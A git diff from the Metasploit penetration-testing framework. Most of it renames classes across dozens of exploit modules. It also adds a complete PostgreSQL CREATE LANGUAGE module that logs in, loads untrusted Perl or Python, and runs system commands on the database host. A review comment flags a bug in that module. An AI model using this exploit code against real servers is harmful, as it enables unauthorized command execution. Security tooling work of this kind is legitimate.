diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb index 18db711cc3..6b0159a527 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/misc/xdh_x_exec.rb b/modules/exploits/multi/misc/xdh_x_exec.rb index 8e3c0fda70..129fe038fc 100644 --- a/modules/exploits/multi/misc/xdh_x_exec.rb +++ b/modules/exploits/multi/misc/xdh_x_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/zend_java_bridge.rb b/modules/exploits/multi/misc/zend_java_bridge.rb index a433889c5e..2a361b807f 100644 --- a/modules/exploits/multi/misc/zend_java_bridge.rb +++ b/modules/exploits/multi/misc/zend_java_bridge.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb index 5b0e336fc0..6f5190ac45 100644 --- a/modules/exploits/multi/ntp/ntp_overflow.rb +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index a6883a67ca..c609ef77bf 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb 
+++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/postgres/postgres_createlang.rb b/modules/exploits/multi/postgres/postgres_createlang.rb new file mode 100644 index 0000000000..2d4d1c611d --- /dev/null +++ b/modules/exploits/multi/postgres/postgres_createlang.rb 
@@ -0,0 +1,208 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/exploit/postgres' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Postgres + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PostgreSQL CREATE LANGUAGE Execution', + 'Description' => %q( + Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages. + Most commonly this is Perl and Python. When enabled, command execution is possible on the host. + To execute system commands, loading the "untrusted" version of the language is necessary. + This requires a superuser. This is usually postgres. The execution should be platform-agnostic, + and has been tested on OS X, Windows, and Linux. + + This module attempts to load Perl or Python to execute system commands. As this dynamically loads + a scripting language to execute commands, it is not necessary to drop a file on the filesystem. + + Only Postgres 8 and up are supported. 
+ ), + 'Author' => [ + 'Micheal Cottingham', # author of this module + 'midnitesnake', # the postgres_payload module that this is based on, + 'Nixawk' # Improves the module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'], + ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'], + ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html'] + ], + 'Platform' => %w(linux unix win osx), + 'Payload' => { + 'PayloadType' => %w(cmd) + }, + 'Arch' => [ARCH_CMD], + 'Targets' => [ + ['Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 1 2016')) + + deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE') + end + + def postgres_major_version(version) + version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/) + version_match['major_version'] + end + + def check + if vuln_version? + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def vuln_version? + version = postgres_fingerprint + if version[:auth] + major_version = postgres_major_version(version[:auth]) + return true if major_version && major_version.to_i >= 8 + end + false + end + + def login_success? 
+ status = do_login(username, password, database) + case status + when :noauth + print_error "#{peer} - Authentication failed" + return false + when :noconn + print_error "#{peer} - Connection failed" + return false + else + print_status "#{peer} - #{status}" + return true + end + end + + def load_extension?(language) + case load_procedural_language(language, 'LANGUAGE') + when :exists + print_good "#{peer} - #{language} is already loaded, continuing" + return true + when :loaded + print_good "#{peer} - #{language} was successfully loaded, continuing" + return true + when :not_exists + print_status "#{peer} - #{language} could not be loaded" + return false + else + print_error "#{peer} - error occurred loading #{language}" + return false + end + end + + def exec_function?(func_name) + query = "SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')" + select_query = postgres_query(query) + + case select_query.keys[0] + when :conn_error + print_error "#{peer} - Connection error" + return false + when :sql_error + print_error "#{peer} - Exploit failed" + return false + when :complete + print_good "#{peer} - Exploit successful" + return true + else + print_error "#{peer} - Unknown" + return false + end + end + + def create_function?(language, func_name) + load_func = '' + + case language + when 'perl' + query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" + query << "`$_[0]`;" + query << "$$ LANGUAGE pl#{language}u" + load_func = postgres_query(query) + when /^python(?:2|3)?/i + query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" + query << "import subprocess, shlex\rsubprocess.check_output(shlex.split(c))\r" + query << "$$ LANGUAGE pl#{language}u" + load_func = postgres_query(query) + end + + case load_func.keys[0] + when :conn_error + print_error "#{peer} - Connection error" + return false + when :sql_error + print_error "#{peer} Exploit failed" + return false + when :complete + print_good "#{peer} - 
Loaded UDF (exec_#{func_name})" + return true + else + print_error "#{peer} - Unknown" + return false + end + end + + def load_procedural_language(language, extension) + query = "CREATE #{extension} pl#{language}u" + load_language = postgres_query(query) + return :loaded unless load_language.keys[0] == :sql_error + + match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m) + return :exists if match_exists + + match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m) + return :not_exists if match_error + end + + def do_login(user, pass, database) + begin + password = pass || postgres_password + result = postgres_fingerprint( + db: database, + username: user, + password: password + ) + + return result[:auth] if result[:auth] + print_status "#{peer} - Login failed" + return :noauth + + rescue Rex::ConnectionError + return :noconn + end + end + + def exploit + return unless vuln_version? + return unless login_success? + + languages = %w(perl python python2 python3) + languages.each do |language| + next unless load_extension?(language) + func_name = Rex::Text.rand_text_alpha(10) + next unless create_function?(language, func_name) + if exec_function?(func_name) + print_warning "Please clear extension [#{language}]: function [#{func_name}] manually" + break + end + end + postgres_logout if @postgres_conn + end +end diff --git a/modules/exploits/multi/realserver/describe.rb b/modules/exploits/multi/realserver/describe.rb index c6134b819a..5cb8006f8e 100644 --- a/modules/exploits/multi/realserver/describe.rb +++ b/modules/exploits/multi/realserver/describe.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient 
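Review bot: `postgres_major_version` in the new postgres_createlang.rb indexes the result of `version.match(...)` without checking it for nil. Any fingerprint string that does not fit the pattern (exactly ten word characters, then three dotted numbers; a two-part version would not match) makes both `check` and `exploit` raise NoMethodError instead of reporting Safe. `vuln_version?` already tolerates a nil major version, so the method's last line can be `version_match && version_match['major_version']`. Separately, this file adds `#{peer} - ` to every message while the rest of the commit removes that prefix, and the `:sql_error` message in `create_function?` lacks the dash (`"#{peer} Exploit failed"`).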
diff --git a/modules/exploits/multi/samba/nttrans.rb b/modules/exploits/multi/samba/nttrans.rb index 6f1f3652da..55bce31106 100644 --- a/modules/exploits/multi/samba/nttrans.rb +++ b/modules/exploits/multi/samba/nttrans.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/multi/samba/usermap_script.rb b/modules/exploits/multi/samba/usermap_script.rb index 24a37cc018..273535b2d3 100644 --- a/modules/exploits/multi/samba/usermap_script.rb +++ b/modules/exploits/multi/samba/usermap_script.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb index da27883df6..4143c99639 100644 --- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /gSOAP\/2.7/ ] } @@ -77,7 +77,7 @@ class Metasploit4 < Msf::Exploit::Remote ], self.class) register_advanced_options( [ - OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '7500']), + OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', 7500]), ], self.class) register_autofilter_ports([ 50013 ]) end diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb index 5f19e6518f..29b4f79091 100644 --- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb 
@@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb index 3317ebcd9a..0b7ec86a63 100644 --- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index ffeb54e5a4..804b286342 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 51a57cbc44..aa63a817f5 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb index 7f5a0f9234..db88821c4f 100644 --- a/modules/exploits/multi/svn/svnserve_date.rb +++ b/modules/exploits/multi/svn/svnserve_date.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Brute 
diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index d7b0a59908..668405d446 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking def initialize(info = {}) diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb index b22a3d9646..b34c130d95 100644 --- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb +++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/rfb' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking WINDOWS_KEY = "\xff\xeb" diff --git a/modules/exploits/multi/vpn/tincd_bof.rb b/modules/exploits/multi/vpn/tincd_bof.rb index d391ce8da5..e9528b6b5b 100644 --- a/modules/exploits/multi/vpn/tincd_bof.rb +++ b/modules/exploits/multi/vpn/tincd_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'securerandom' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::EXE diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb index 786a20d57a..35ce7f691f 100644 --- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb +++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb @@ -6,7 +6,7 @@ require 'timeout' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/netware/smb/lsass_cifs.rb b/modules/exploits/netware/smb/lsass_cifs.rb index 04c141d2a7..6693f0923b 100644 --- a/modules/exploits/netware/smb/lsass_cifs.rb 
+++ b/modules/exploits/netware/smb/lsass_cifs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/netware/sunrpc/pkernel_callit.rb b/modules/exploits/netware/sunrpc/pkernel_callit.rb index 0ab1da752a..51a3178859 100644 --- a/modules/exploits/netware/sunrpc/pkernel_callit.rb +++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/osx/afp/loginext.rb b/modules/exploits/osx/afp/loginext.rb index f3ec48b721..a79cdfa897 100644 --- a/modules/exploits/osx/afp/loginext.rb +++ b/modules/exploits/osx/afp/loginext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/osx/arkeia/type77.rb b/modules/exploits/osx/arkeia/type77.rb index 45f1f5cd58..175fc3b918 100644 --- a/modules/exploits/osx/arkeia/type77.rb +++ b/modules/exploits/osx/arkeia/type77.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Arkeia diff --git a/modules/exploits/osx/browser/mozilla_mchannel.rb b/modules/exploits/osx/browser/mozilla_mchannel.rb index c7331b84ea..870e5fdfe2 100644 --- a/modules/exploits/osx/browser/mozilla_mchannel.rb +++ b/modules/exploits/osx/browser/mozilla_mchannel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML 
diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index e00fd67998..d799eff564 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/service_manager' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote # msf/core/exploit/http/server.rb # def start_http(opts={}) - # Ensture all dependencies are present before initializing HTTP + # Ensure all dependencies are present before initializing HTTP use_zlib comm = datastore['ListenerComm'] @@ -255,7 +255,7 @@ class Metasploit3 < Msf::Exploit::Remote # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/exploits/osx/browser/safari_metadata_archive.rb b/modules/exploits/osx/browser/safari_metadata_archive.rb index 27f17742a8..0c1d0842ce 100644 --- a/modules/exploits/osx/browser/safari_metadata_archive.rb +++ b/modules/exploits/osx/browser/safari_metadata_archive.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb b/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb index 3ba0b94a96..642b354d39 100644 --- a/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb +++ b/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb index b3f464b21a..8af9d76beb 100644 --- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb +++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/browser/software_update.rb b/modules/exploits/osx/browser/software_update.rb index d360a35626..d4db34dba8 100644 --- a/modules/exploits/osx/browser/software_update.rb +++ b/modules/exploits/osx/browser/software_update.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/osx/email/mailapp_image_exec.rb b/modules/exploits/osx/email/mailapp_image_exec.rb index fe08b1e373..d98f9e22b3 100644 --- a/modules/exploits/osx/email/mailapp_image_exec.rb +++ b/modules/exploits/osx/email/mailapp_image_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/osx/ftp/webstar_ftp_user.rb b/modules/exploits/osx/ftp/webstar_ftp_user.rb index c61f1ceb23..651d321fc0 100644 --- a/modules/exploits/osx/ftp/webstar_ftp_user.rb +++ b/modules/exploits/osx/ftp/webstar_ftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp 
diff --git a/modules/exploits/osx/http/evocam_webserver.rb b/modules/exploits/osx/http/evocam_webserver.rb index 2e4a586b97..26e58fd9ce 100644 --- a/modules/exploits/osx/http/evocam_webserver.rb +++ b/modules/exploits/osx/http/evocam_webserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/osx/local/dyld_print_to_file_root.rb b/modules/exploits/osx/local/dyld_print_to_file_root.rb index 28008e88b5..1061094e07 100644 --- a/modules/exploits/osx/local/dyld_print_to_file_root.rb +++ b/modules/exploits/osx/local/dyld_print_to_file_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/iokit_keyboard_root.rb b/modules/exploits/osx/local/iokit_keyboard_root.rb index e0b2c5f914..6c3a95d1b3 100644 --- a/modules/exploits/osx/local/iokit_keyboard_root.rb +++ b/modules/exploits/osx/local/iokit_keyboard_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking # Can cause kernel crash include Msf::Post::File diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb index c4683889ab..42b4c462cc 100644 --- a/modules/exploits/osx/local/nfs_mount_root.rb +++ b/modules/exploits/osx/local/nfs_mount_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/osx/local/persistence.rb b/modules/exploits/osx/local/persistence.rb index 260632a90d..33de13001d 100644 --- a/modules/exploits/osx/local/persistence.rb +++ b/modules/exploits/osx/local/persistence.rb 
@@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'shellwords' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common diff --git a/modules/exploits/osx/local/rootpipe.rb b/modules/exploits/osx/local/rootpipe.rb index f22d6cb6a2..b438b4513c 100644 --- a/modules/exploits/osx/local/rootpipe.rb +++ b/modules/exploits/osx/local/rootpipe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/rootpipe_entitlements.rb b/modules/exploits/osx/local/rootpipe_entitlements.rb index 0a031f7a11..32ec381c51 100644 --- a/modules/exploits/osx/local/rootpipe_entitlements.rb +++ b/modules/exploits/osx/local/rootpipe_entitlements.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/rsh_libmalloc.rb b/modules/exploits/osx/local/rsh_libmalloc.rb index 97f9ae28dc..552003fd13 100644 --- a/modules/exploits/osx/local/rsh_libmalloc.rb +++ b/modules/exploits/osx/local/rsh_libmalloc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index c77d4a4a2a..d4969cd478 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index 019a6bb019..dddb7b82a0 100644 
--- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index fe54af173c..018af4fcbe 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'shellwords' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local # ManualRanking because it's going to modify system time # Even when it will try to restore things, user should use diff --git a/modules/exploits/osx/local/tpwn.rb b/modules/exploits/osx/local/tpwn.rb index bfd0864d61..fddd890501 100644 --- a/modules/exploits/osx/local/tpwn.rb +++ b/modules/exploits/osx/local/tpwn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking diff --git a/modules/exploits/osx/local/vmware_bash_function_root.rb b/modules/exploits/osx/local/vmware_bash_function_root.rb index ff20c7fe02..25410875e1 100644 --- a/modules/exploits/osx/local/vmware_bash_function_root.rb +++ b/modules/exploits/osx/local/vmware_bash_function_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/osx/mdns/upnp_location.rb b/modules/exploits/osx/mdns/upnp_location.rb index 3d32b05a7c..99667e4a44 100644 --- a/modules/exploits/osx/mdns/upnp_location.rb +++ b/modules/exploits/osx/mdns/upnp_location.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/osx/misc/ufo_ai.rb b/modules/exploits/osx/misc/ufo_ai.rb index 82404e2244..35011f1d02 100644 --- a/modules/exploits/osx/misc/ufo_ai.rb +++ b/modules/exploits/osx/misc/ufo_ai.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb index e9e228911d..3dfedafd3d 100644 --- a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb +++ b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/osx/samba/lsa_transnames_heap.rb b/modules/exploits/osx/samba/lsa_transnames_heap.rb index 3eca9265e6..03bc2152dd 100644 --- a/modules/exploits/osx/samba/lsa_transnames_heap.rb +++ b/modules/exploits/osx/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/osx/samba/trans2open.rb b/modules/exploits/osx/samba/trans2open.rb index bcd15fbb39..7e0e123d0a 100644 --- a/modules/exploits/osx/samba/trans2open.rb +++ b/modules/exploits/osx/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client 
diff --git a/modules/exploits/solaris/dtspcd/heap_noir.rb b/modules/exploits/solaris/dtspcd/heap_noir.rb index ecf0331613..f65d028141 100644 --- a/modules/exploits/solaris/dtspcd/heap_noir.rb +++ b/modules/exploits/solaris/dtspcd/heap_noir.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/lpd/sendmail_exec.rb b/modules/exploits/solaris/lpd/sendmail_exec.rb index f71bdad36d..d7739db4ca 100644 --- a/modules/exploits/solaris/lpd/sendmail_exec.rb +++ b/modules/exploits/solaris/lpd/sendmail_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/samba/lsa_transnames_heap.rb b/modules/exploits/solaris/samba/lsa_transnames_heap.rb index 4445b77033..09b25d9077 100644 --- a/modules/exploits/solaris/samba/lsa_transnames_heap.rb +++ b/modules/exploits/solaris/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git 